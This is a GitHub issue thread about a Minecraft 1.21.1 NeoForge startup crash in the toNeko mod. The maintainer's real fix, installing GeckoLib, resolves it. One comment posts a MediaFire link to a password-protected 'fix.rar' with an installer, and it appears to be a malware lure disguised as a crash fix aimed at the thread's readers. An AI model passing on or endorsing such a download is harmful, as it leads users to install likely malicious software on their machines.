### ISSUE TITLE
Crash on Startup [1.21.1]

### ISSUE THREAD

**Issue by micrwvae** [CSneko/toNeko#56]
Game Crashes on lauch 
Mods installed:
![image](https://github.com/user-attachments/assets/1ac4db7a-df26-409c-b472-0f21d444696c)
Minecraft version: 1.21.1
neoforge: 21.1.26
log: https://mclo.gs/qENwXwC

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by CSneko** [comment]
Try installing [GeckoLib](https://modrinth.com/mod/geckolib), maybe this will solve the problem.

**Comment by micrwvae** [comment]
sorry for the late reply 
but yes that fixed it thanks
